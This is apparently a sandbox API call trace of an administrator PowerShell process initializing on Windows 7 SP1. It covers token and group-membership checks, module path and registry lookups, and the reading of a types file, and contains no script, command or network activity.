	[0720.092] GetVersionExW (in: lpVersionInformation=0xcd860*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcd860*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0720.095] GetCurrentProcess () returned 0xffffffffffffffff
	[0720.096] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xcd8f8 | out: TokenHandle=0xcd8f8*=0x2ec) returned 1
	[0720.101] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xcd818 | out: TokenInformation=0x0, ReturnLength=0xcd818) returned 0
	[0720.102] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x287310
	[0720.102] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x8, TokenInformation=0x287310, TokenInformationLength=0x4, ReturnLength=0xcd818 | out: TokenInformation=0x287310, ReturnLength=0xcd818) returned 1
	[0720.103] DuplicateTokenEx (in: hExistingToken=0x2ec, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0xcd978 | out: phNewToken=0xcd978*=0x2e8) returned 1
	[0720.104] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xcd818 | out: TokenInformation=0x0, ReturnLength=0xcd818) returned 0
	[0720.104] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x287340
	[0720.104] GetTokenInformation (in: TokenHandle=0x2ec, TokenInformationClass=0x8, TokenInformation=0x287340, TokenInformationLength=0x4, ReturnLength=0xcd818 | out: TokenInformation=0x287340, ReturnLength=0xcd818) returned 1
	[0720.105] CheckTokenMembership (in: TokenHandle=0x2e8, SidToCheck=0x2d32f88*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0xcd988 | out: IsMember=0xcd988) returned 1
	[0720.105] CloseHandle (hObject=0x2e8) returned 1
	[0720.105] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd3e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0720.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0720.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0720.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0721.560] CoTaskMemAlloc (cb=0x804) returned 0x1b811210
	[0721.560] GetConsoleTitleW (in: lpConsoleTitle=0x1b811210, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x48
	[0723.094] CoTaskMemFree (pv=0x1b811210) 
	[0723.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0723.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0723.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0723.109] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xcd3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0724.590] CoTaskMemAlloc (cb=0x104) returned 0x27bac0
	[0724.591] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0724.591] CoTaskMemFree (pv=0x27bac0) 
	[0724.598] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x314
	[0724.600] CoCreateGuid (in: pguid=0xcda70 | out: pguid=0xcda70*(Data1=0xd6077c02, Data2=0x82b4, Data3=0x4759, Data4=([0]=0xa2, [1]=0x15, [2]=0x48, [3]=0xfe, [4]=0xf1, [5]=0x2c, [6]=0xe3, [7]=0x0))) returned 0x0
	[0724.601] CoTaskMemAlloc (cb=0x104) returned 0x27bac0
	[0724.601] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0724.601] CoTaskMemFree (pv=0x27bac0) 
	[0726.245] WinSqmIsOptedIn () returned 0x0
	[0726.246] CoTaskMemAlloc (cb=0x104) returned 0x27bac0
	[0726.246] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0726.247] CoTaskMemFree (pv=0x27bac0) 
	[0726.252] CoTaskMemAlloc (cb=0x104) returned 0x27bac0
	[0726.252] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0726.252] CoTaskMemFree (pv=0x27bac0) 
	[0726.253] CoTaskMemAlloc (cb=0x104) returned 0x27bac0
	[0726.253] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0726.253] CoTaskMemFree (pv=0x27bac0) 
	[0726.256] CoTaskMemAlloc (cb=0x104) returned 0x27bac0
	[0726.256] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0726.256] CoTaskMemFree (pv=0x27bac0) 
	[0726.258] CoTaskMemAlloc (cb=0x104) returned 0x27bac0
	[0726.258] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0726.258] CoTaskMemFree (pv=0x27bac0) 
	[0726.269] CoTaskMemAlloc (cb=0x104) returned 0x27bac0
	[0726.269] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0726.269] CoTaskMemFree (pv=0x27bac0) 
	[0726.269] CoTaskMemAlloc (cb=0x104) returned 0x27bac0
	[0726.269] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0726.269] CoTaskMemFree (pv=0x27bac0) 
	[0726.270] CoTaskMemAlloc (cb=0x104) returned 0x27bac0
	[0726.270] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0726.270] CoTaskMemFree (pv=0x27bac0) 
	[0726.272] CoTaskMemAlloc (cb=0x104) returned 0x27bac0
	[0726.272] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0726.272] CoTaskMemFree (pv=0x27bac0) 
	[0726.277] CoTaskMemAlloc (cb=0x104) returned 0x27bac0
	[0726.277] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0726.277] CoTaskMemFree (pv=0x27bac0) 
	[0726.278] CoTaskMemAlloc (cb=0x104) returned 0x27bac0
	[0726.278] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0726.278] CoTaskMemFree (pv=0x27bac0) 
	[0726.278] CoTaskMemAlloc (cb=0x104) returned 0x27bac0
	[0726.278] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0726.278] CoTaskMemFree (pv=0x27bac0) 
	[0731.650] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0731.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0731.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0731.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0731.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0731.651] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0731.652] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0731.652] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0731.652] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0731.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0731.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0731.653] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0731.655] CoTaskMemAlloc (cb=0x104) returned 0x27bac0
	[0731.655] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x27bac0, nSize=0x80 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x75
	[0731.655] CoTaskMemFree (pv=0x27bac0) 
	[0731.657] CoTaskMemAlloc (cb=0xcc) returned 0x328520
	[0731.657] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x328520, nSize=0x64 | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerS") returned 0x76
	[0731.657] CoTaskMemFree (pv=0x328520) 
	[0731.657] CoTaskMemAlloc (cb=0xf0) returned 0x1b80b740
	[0731.657] ExpandEnvironmentStringsW (in: lpSrc="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b80b740, nSize=0x76 | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x76
	[0731.657] CoTaskMemFree (pv=0x1b80b740) 
	[0731.657] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd5e8 | out: phkResult=0xcd5e8*=0x318) returned 0x0
	[0731.657] RegQueryValueExW (in: hKey=0x318, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xcd56c, lpData=0x0, lpcbData=0xcd568*=0x0 | out: lpType=0xcd56c*=0x2, lpData=0x0, lpcbData=0xcd568*=0x6c) returned 0x0
	[0731.658] CoTaskMemAlloc (cb=0x70) returned 0x2c08a0
	[0731.658] RegQueryValueExW (in: hKey=0x318, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xcd53c, lpData=0x2c08a0, lpcbData=0xcd538*=0x6c | out: lpType=0xcd53c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0xcd538*=0x6c) returned 0x0
	[0731.658] CoTaskMemFree (pv=0x2c08a0) 
	[0731.658] CoTaskMemAlloc (cb=0xcc) returned 0x328520
	[0731.658] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x328520, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0731.658] CoTaskMemFree (pv=0x328520) 
	[0731.658] CoTaskMemAlloc (cb=0xcc) returned 0x328520
	[0731.658] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x328520, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0731.658] CoTaskMemFree (pv=0x328520) 
	[0733.270] RegCloseKey (hKey=0x318) returned 0x0
	[0733.270] CoTaskMemAlloc (cb=0xcc) returned 0x328520
	[0733.270] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x328520, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0733.270] CoTaskMemFree (pv=0x328520) 
	[0733.270] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd5e8 | out: phkResult=0xcd5e8*=0x318) returned 0x0
	[0733.270] RegQueryValueExW (in: hKey=0x318, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xcd56c, lpData=0x0, lpcbData=0xcd568*=0x0 | out: lpType=0xcd56c*=0x0, lpData=0x0, lpcbData=0xcd568*=0x0) returned 0x2
	[0733.270] RegCloseKey (hKey=0x318) returned 0x0
	[0733.281] CoTaskMemAlloc (cb=0x104) returned 0x27bac0
	[0733.281] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0733.281] CoTaskMemFree (pv=0x27bac0) 
	[0733.283] CoTaskMemAlloc (cb=0x104) returned 0x27bac0
	[0733.283] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0733.283] CoTaskMemFree (pv=0x27bac0) 
	[0733.287] CoTaskMemAlloc (cb=0x104) returned 0x27bac0
	[0733.287] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0733.287] CoTaskMemFree (pv=0x27bac0) 
	[0733.288] CoTaskMemAlloc (cb=0x104) returned 0x27bac0
	[0733.288] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0733.288] CoTaskMemFree (pv=0x27bac0) 
	[0733.289] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd3d8 | out: phkResult=0xcd3d8*=0x318) returned 0x0
	[0733.290] RegQueryValueExW (in: hKey=0x318, lpValueName="path", lpReserved=0x0, lpType=0xcd3ec, lpData=0x0, lpcbData=0xcd3e8*=0x0 | out: lpType=0xcd3ec*=0x1, lpData=0x0, lpcbData=0xcd3e8*=0x74) returned 0x0
	[0733.290] RegQueryValueExW (in: hKey=0x318, lpValueName="path", lpReserved=0x0, lpType=0xcd35c, lpData=0x0, lpcbData=0xcd358*=0x0 | out: lpType=0xcd35c*=0x1, lpData=0x0, lpcbData=0xcd358*=0x74) returned 0x0
	[0733.291] CoTaskMemAlloc (cb=0x78) returned 0x2c08a0
	[0733.291] RegQueryValueExW (in: hKey=0x318, lpValueName="path", lpReserved=0x0, lpType=0xcd32c, lpData=0x2c08a0, lpcbData=0xcd328*=0x74 | out: lpType=0xcd32c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0xcd328*=0x74) returned 0x0
	[0733.291] CoTaskMemFree (pv=0x2c08a0) 
	[0733.291] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0xcd0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0733.291] SetErrorMode (uMode=0x1) returned 0x1
	[0733.291] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xcd2b0 | out: lpFileInformation=0xcd2b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0733.291] SetErrorMode (uMode=0x1) returned 0x1
	[0733.291] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xcd0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0733.292] SetErrorMode (uMode=0x1) returned 0x1
	[0733.292] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd2b0 | out: lpFileInformation=0xcd2b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0733.292] SetErrorMode (uMode=0x1) returned 0x1
	[0733.293] CoTaskMemAlloc (cb=0x104) returned 0x27bac0
	[0733.293] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0733.293] CoTaskMemFree (pv=0x27bac0) 
	[0733.295] CoTaskMemAlloc (cb=0x104) returned 0x27bac0
	[0733.295] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27bac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0733.295] CoTaskMemFree (pv=0x27bac0) 
	[0733.295] GetACP () returned 0x4e4
	[0734.540] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xccc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0734.540] SetErrorMode (uMode=0x1) returned 0x1
	[0734.541] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0734.542] GetFileType (hFile=0x324) returned 0x1
	[0734.542] SetErrorMode (uMode=0x1) returned 0x1
	[0734.542] GetFileType (hFile=0x324) returned 0x1
	[0734.546] ReadFile (in: hFile=0x324, lpBuffer=0x2dbd588, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2dbd588*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0734.548] ReadFile (in: hFile=0x324, lpBuffer=0x2dbd588, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2dbd588*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0734.548] ReadFile (in: hFile=0x324, lpBuffer=0x2dbd588, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2dbd588*, lpNumberOfBytesRead=0xcd1e8*=0x1000, lpOverlapped=0x0) returned 1
	[0734.549] ReadFile (in: hFile=0x324, lpBuffer=0x2dbd588, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2dbd588*, lpNumberOfBytesRead=0xcd1e8*=0xcf3, lpOverlapped=0x0) returned 1
	[0734.549] ReadFile (in: hFile=0x324, lpBuffer=0x2dbc9e3, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2dbc9e3*, lpNumberOfBytesRead=0xcd1e8*=0x0, lpOverlapped=0x0) returned 1
	[0734.549] ReadFile (in: hFile=0x324, lpBuffer=0x2dbd588, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd1e8, lpOverlapped=0x0 | out: lpBuffer=0x2dbd588*, lpNumberOfBytesRead=0xcd1e8*=0x0, lpOverlapped=0x0) returned 1
	[0734.551] CloseHandle (hObject=0x324) returned 1
	[0734.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xccf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0734.554] SetErrorMode (uMode=0x1) returned 0x1
